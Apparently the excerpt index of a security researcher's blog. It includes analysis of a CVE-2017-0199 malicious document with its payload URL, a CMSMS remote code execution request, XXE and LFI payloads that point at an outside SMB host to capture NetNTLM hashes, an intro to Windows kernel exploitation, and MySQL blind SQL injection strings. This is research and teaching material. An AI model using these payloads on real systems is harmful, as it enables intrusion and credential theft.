APT attack in Bangladesh

One of my friends from Bangladesh @rudr4_sarkar sent me this link to analyze which leads to a Word document.
http://mozillatm.com/A0Jst6jAd7CYerrqFmwb4wqDLa5XHPW_May_2017.doc

VirusTotal: https://virustotal.com/en/file/273b0fc627daefd0fbae209e5fa1ea619bfb177a1b0ae2d55a606cf2c6ec2674/analysis/1496541543/

I figured out that this was the CVE-2017-0199 exploit. It was simple to find the payload.

[code language=”python”]
b = ‘00000068007400740070003a002f002f006d006f007a0069006c006c00610074006d002e0063006f006d002f006c006f006100640069006e0067002e00680074006d006c00000000′

"".join("{0}".format((i+j).replace(’00’,”).decode(‘hex’)) for i, j in zip(b[::2], b[1::2]))

>> ‘http://mozillatm.com/loading.html’
[/code]

This exploit will deliver a malicious HTA file and execute it. HTA means IE, so yeah VBScript will execute nicely.
(more…)

CMSMS 2.1.6 Multiple Vulnerabilities

One day I felt like reviewing the source code of some random CMS and I picked CMSMS. This is totally random and I did this to kill boredom.

Remote Code Execution – CVE-2017-8912

In admin/editusertag.php you can create custom user defined tags in which evil PHP functions are not blacklisted.

[code language=”text”]
POST /cms/cmsimple/admin/editusertag.php?_sk_=2a7da2216d41e0ac&userplugin_id=4 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://localhost/cms/cmsimple/admin/editusertag.php?_sk_=2a7da2216d41e0ac&userplugin_id=4
Content-Length: 115
Cookie: cms_admin_user_id=1; cms_passhash=4df45e48ad5885afabe27e446666421b; _sk_=2a7da2216d41e0ac; CMSSESSIDacef9ab5f31b=mckpbvrmtj7n6ri53kiol718c5
Connection: close
Pragma: no-cache
Cache-Control: no-cache

_sk_=2a7da2216d41e0ac&userplugin_id=4&userplugin_name=aaa&code=passthru(‘dir’)%3B&description=&run=1&apply=1&ajax=1
[/code]


(more…)

A Simple API Monitor

This is a simple Windbg script to monitor common Win32 API calls and display the strings, IPs, Ports, Registry keys passed to the APIs. The Win32 API is huge and I have used common APIs used by programs and malware. I coded this for fun 🙂

[code]
Usage: ApiMon.wds run; g;
[/code]

You can remove APIs as you wish to minimize the output or you can add any API you desire. For example
[code]
bp DLLName!APIName @"$$>a<${$arg0} APIName FileNamePtr

bp kernelbase!CreateFileA @"$$>a<${$arg0} CreateFileA 1";
[/code]

This is a sample output that uses CreateProcess API.

This is from running netcat.

Download: https://github.com/OsandaMalith/ApiMon
(more…)

Executing Shellcode Directly

I found this post by Alex Ionescu pretty interesting. I recreated the poc and wrote position independent shellcode. It’s more like executing shellcode directly by the windows loader.

One could develop complete malware by dynamically locating the base address of kernel32.dll and once you locate the functions LoadLibraryA and GetProcAddress, you can load any library in the system and find the exported symbols, in which you have complete access to the win32 API.

You don’t need to specifically write position independent code using assembly. You can directly code in C/C++ and extract the opcodes.

For example using the ‘InMemoryOrderModuleList’ LDR_DATA_TABLE_ENTRY located in the PEB->LDR we can get the base address of kernel32.dll. Usually kernel32.dll can be found in the third LDR_MODULE in the double linked list. If you have done shellcoding under Windows these things should be familiar.
(more…)

Windows Kernel Exploitation: Stack Overflow

Introduction

This post is on exploiting a stack based buffer overflow in the HackSysExtremeVulnerableDriver.
There’s lot of background theory required to understand types of Windows drivers, developing drivers, debugging drivers, etc. I will only focus on developing the exploit while explaining some internal structures briefly. I would assume you have experience with assembly, C, debugging in the userland.
This driver is a kernel driver. A driver is typically used to get our code into the kernel. An unhandled exception will cause the famous BSOD. I will be using Windows 7 32-bit for this since it doesn’t support SMEP (Supervisor Mode Execution Prevention) or SMAP (Supervisor Mode Access Prevention). In simple words, I would say that when SMEP is enabled the CPU will generate a fault whenever the ring0 tries to execute code from a page marked with the user bit. Basically, due to this being not enabled, we can map our shellcode to steal the ‘System’ token. Check the Shellcode Analysis part for the analysis. Exploiting this vulnerability on a 64-bit system is different.
You can use the OSR Driver Loader to load the driver into the system.
If you want to debug the machine itself using windbg you can use VirtualKD or LiveKD

You can add a new serial connection using VirtualBox or VMware, so you can debug the guest system via windbg. I will be using a serial connection from VMware.
For kernel data structures refer to this. I have used it mostly to refer the structures.
After you have registered the driver you should see this in ‘msinfo32’.

If you check the loaded modules in the ‘System’ process you should see our kernel driver ‘HEVD.sys’.


(more…)

Places of Interest in Stealing NetNTLM Hashes

One day me and @m3g9tr0n were discussing different places where we can use responder in stealing NetNTLM hashes. After experimenting I thought of writing this post along with some cool findings in the world of Windows. SMBRelay attacks are also possible in these scenarios.

LFI

The include() in PHP will resolve the network path for us.

http://host.tld/?page=//11.22.33.44/@OsandaMalith

XXE

In here I’m using “php://filter/convert.base64-encode/resource=” that will resolve a network path.

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=//11.22.33.44/@OsandaMalith" >
]>
<root>
  <name></name>
  <tel></tel>
  <email>OUT&xxe;OUT</email>
  <password></password>
</root>


(more…)

Lab01-02 Analysis

This program is packed using UPX and can be easily unpacked.

At the start we see a call to ‘StartServiceCtrlDispatcher’ which is used to implement a service and the service control manager will call the service entry point provided. In here I have labeled the service entry point as ‘ServiceMain’. The name of the service created would be ‘Malservice’.

(more…)

MySQL Blind Injection in Insert and Update Statements

I’m not going to explain or write about blind injection in general. There are enough resources on the internet where you can learn. You can check my previous post where I have explained in detail about other types of injections in these statements. Since some of you asked me how to perform blind injection I thought of writing this post.

Boolean Based Blind Injection

We can use ‘+’ or bitwise OR in this scenario. If the result is true the entry will be updated with a ‘1’ and if the result is false the entry will be updated with a ‘0’.
I’m using binary search to make the search faster. Mid = (max+min)/2.
However I’m not sure if this is realistic.

update users set username =0’ | (substr(user(),1,1) regexp 0x5e5b6d2d7a5d) where id=14;
insert into users values (15,’osanda’,'0'| (substr(user(),1,1) regexp 0x5e5b6d2d7a5d));

Time Based Blind Injection

This approach would be realistic. In this case we can use functions such as sleep(), benchmark(). Like before by using ‘+’ or bitwise OR we can know if the result is true or false when updated or inserted.

update users set username = '0'|if((substr(user(),1,1) regexp 0x5e5b6d2d7a5d), sleep(5), 1) where id=15;
insert into users values (16,’osanda’,'0'| if((substr(user(),1,1) regexp 0x5e5b6d2d7a5d), sleep(5), 1));

Conclusion

The same can be applied to DELETE statements as well, but the injection is not realistic. There are many methods you can follow using the above syntax. You can develop your own tool to automate this process and improve the efficiency of the search.